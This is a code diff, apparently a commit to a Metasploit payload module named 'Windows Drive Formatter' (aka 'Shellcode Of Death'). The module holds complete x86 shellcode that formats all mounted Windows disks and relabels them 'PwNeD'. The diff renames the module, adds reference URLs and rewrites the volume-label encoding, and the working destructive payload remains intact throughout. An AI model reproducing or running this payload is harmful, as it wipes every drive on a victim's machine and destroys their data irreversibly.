44##
55
66###
7- # uuuuuuu
8- # uu$$$$$$$$$$$uu
9- # uu$$$$$$$$$$$$$$$$$uu
10- # u$$$$$$$$$$$$$$$$$$$$$u
11- # u$$$$$$$$$$$$$$$$$$$$$$$u
12- # u$$$$$$$$$$$$$$$$$$$$$$$$$u
13- # u$$$$$$$$$$$$$$$$$$$$$$$$$u
14- # u$$$$$$" "$$$" "$$$$$$u
15- # "$$$$" u$u $$$$"
16- # $$$u u$u u$$$
17- # $$$u u$$$u u$$$
18- # "$$$$uu$$$ $$$uu$$$$"
19- # "$$$$$$$" "$$$$$$$"
20- # u$$$$$$$u$$$$$$$u
21- # u$"$"$"$"$"$"$u
22- # uuu $$u$ $ $ $ $u$$ uuu
23- # u$$$$ $$$$$u$u$u$$$ u$$$$
24- # $$$$$uu "$$$$$$$$$" uu$$$$$$
25- # u$$$$$$$$$$$uu """"" uuuu$$$$$$$$$$
26- # $$$$"""$$$$$$$$$$uuu uu$$$$$$$$$"""$$$"
27- # """ ""$$$$$$$$$$$uu ""$"""
28- # uuuu ""$$$$$$$$$$uuu
29- # u$$$uuu$$$$$$$$$uu ""$$$$$$$$$$$uuu$$$
30- # $$$$$$$$$$"""" ""$$$$$$$$$$$"
31- # "$$$$$" Shellcode Of ""$$$$""
32- # $$$" Death $$$$"
33- #
34- #
35- # _ __ _____
36- # /\ /\__ _ ___| | __/ _\_ _ ___ /__ \___ __ _ _ __ ___
37- # / /_/ / _` |/ __| |/ /\ \| | | / __| / /\/ _ \/ _` | '_ ` _ \
38- # / __ / (_| | (__| < _\ \ |_| \__ \ / / | __/ (_| | | | | | |
39- # \/ /_/ \__,_|\___|_|\_\\__/\__, |___/ \/ \___|\__,_|_| |_| |_|
40- # |___/
41- #
42- # http://hacksys.vfreaks.com/
43- 44- #
45- #
467# Shellcode Of Death
478#
48- # Copyright (c) 2012-2013 HackSys Team - Panthera
49- # All rights reserved.
50- #
519# Test bed:
5210# x86: Windows XP SP3, Windows 2003 SP2, Windows 7
5311# x64: Windows 8.1
5816
5917module Metasploit3
6018
19+ Rank = ManualRanking
20+
6121 include Msf ::Payload ::Windows
6222 include Msf ::Payload ::Single
6323
6424 def initialize ( info = { } )
6525 super ( update_info ( info ,
66- 'Name' => 'Shellcode Of Death ' ,
26+ 'Name' => 'Windows Drive Formatter ' ,
6727 'Description' => %q{
68- Formats all the available Windows drives.
28+ This payload formats all mounted disks in
29+ Windows (aka ShellcodeOfDeath).
6930
70- Finally sets the volume label as set by
71- the user. If error occurs, it skips and
72- proceeds formatting the next volume.
31+ After formatting, this payload sets the
32+ volume label to the string specified in
33+ the VOLUMELABEL option. If the code is
34+ unable to access a drive for any reason,
35+ it skips the drive and proceeds to the
36+ next volume.
7337 } ,
74- 'Author' => [ 'Ashfaq Ansari <ashfaq_ansari1989@ hotmail.com>' ,
75- 'Ruei-Min Jiang <@ mike820324>'
38+ 'Author' => [ 'Ashfaq Ansari <ashfaq_ansari1989[at] hotmail.com>' ,
39+ 'Ruei-Min Jiang <mike820324[at]gmail.com >'
7640 ] ,
7741 'License' => MSF_LICENSE ,
42+ 'References' =>
43+ [
44+ [ 'URL' , 'http://hacksys.vfreaks.com/research/shellcode-of-death.html' ] ,
45+ [ 'URL' , 'https://github.com/hacksysteam/ShellcodeOfDeath' ] ,
46+ ] ,
7847 'Platform' => 'win' ,
7948 'Arch' => ARCH_X86 ,
8049 'Privileged' => true ,
@@ -86,25 +55,20 @@ def initialize(info = {})
8655 # Register command execution options
8756 register_options (
8857 [
89- OptString . new ( 'VOLUMELABEL' , [ false , "Set the volume label" , "PwNeD - HackSys Team " ] )
58+ OptString . new ( 'VOLUMELABEL' , [ false , "Set the volume label" , "PwNeD" ] )
9059 ] , self . class )
9160 end
9261
9362 def generate
9463
95- volume_label = datastore [ 'VOLUMELABEL' ] || ""
96- encoded_volume_label = ''
97- temp_voulme_label = volume_label
98-
99- temp_voulme_label . split ( "" ) . each do |i |
100- encoded_volume_label << "#{ i } + "\x00 "
101- end
64+ volume_label = datastore [ 'VOLUMELABEL' ] || ""
65+ encoded_volume_label = volume_label . to_s . unpack ( "C*" ) . pack ( "v*" )
10266
10367 # Calculate the magic key
104- magic_key = 28 + ( 2 * volume_label . length )
68+ magic_key = encoded_volume_label . length + 28
10569
10670 # Actual payload
107- payload_data = "\xeb \x5a \x31 \xc0 \x8b \x34 \x83 \x01 \xd6 \x53 \x50 \x31 \xdb \x31 \xc0 \xac \xc1 \xc3 \x05 \x01 \xc3 \x83 " +
71+ payload_data = "\xeb \x5a \x31 \xc0 \x8b \x34 \x83 \x01 \xd6 \x53 \x50 \x31 \xdb \x31 \xc0 \xac \xc1 \xc3 \x05 \x01 \xc3 \x83 " +
10872 "\xf8 \x00 \x75 \xf3 \xc1 \xcb \x05 \x39 \xcb \x58 \x5b \x74 \x03 \x40 \xeb \xde \xc3 \x89 \xd0 \x8b \x40 \x3c " +
10973 "\x8b \x44 \x02 \x78 \x8d \x04 \x02 \x50 \x8b \x40 \x20 \x8d \x1c \x02 \xe8 \xc3 \xff \xff \xff \x5b \x8b \x4b " +
11074 "\x24 \x8d \x0c \x0a \x66 \x8b \x04 \x41 \x25 \xff \xff \x00 \x00 \x8b \x5b \x1c \x8d \x1c \x1a \x8b \x04 \x83 " +
@@ -117,19 +81,17 @@ def generate
11781 "\x31 \xd2 \x52 \x52 \x6a \x03 \x52 \x6a \x03 \x68 \x00 \x00 \x00 \xc0 \x56 \x8b \x5d \x14 \xff \xd3 \x50 \x83 " +
11882 "\xec \x04 \x31 \xd2 \x52 \x8d \x5c \x24 \x04 \x53 \x52 \x52 \x52 \x52 \x68 \x20 \x00 \x09 \x00 \x50 \x8b \x5d " +
11983 "\x08 \xff \xd3 \xff \x74 \x24 \x04 \x8b \x5d \x0c \xff \xd3 \x8d \x86 " +
120- # You need to adjust this. Logic: 28 + (2 * len(volume_label))
121- magic_key . chr +
84+ # You need to adjust this. Logic: encoded_volume_label.length + 28
85+ [ magic_key ] . pack ( "C" ) +
12286 "\x00 \x00 \x00 \x50 \x68 \x00 \x10 \x00 \x00 \x6a \x01 \x8d \x86 \x1a \x00 \x00 \x00 \x50 \x8d \x86 \x10 \x00 " +
12387 "\x00 \x00 \x50 \x6a \x0c \x8d \x46 \x08 \x50 \x8b \x5d \x00 \xff \xd3 \x68 \xc8 \x00 \x00 \x00 \x8b \x5d \x04 " +
12488 "\xff \xd3 \x89 \xf9 \x83 \x46 \x08 \x01 \xe2 \x8d \x6a \x00 \x8b \x5d \x10 \xff \xd3 \xe8 \x7d \xff \xff \xff " +
12589 "\x5c \x00 \x5c \x00 \x2e \x00 \x5c \x00 \x43 \x00 \x3a \x00 \x5c \x00 \x00 \x00 \x4e \x00 \x54 \x00 \x46 \x00 " +
12690 "\x53 \x00 \x00 \x00 " +
127- # Volume Label
128- # Default: PwNeD - HackSys Team
91+ # Volume Label, default: PwNeD
12992 encoded_volume_label +
130- # Volume Label End
13193 "\x00 \x00 \x55 \x89 \xe5 \x31 \xc0 \x40 \x5d \xc2 \x0c \x00 "
13294
13395 the_payload = payload_data
13496 end
135- end
97+ end
0 commit comments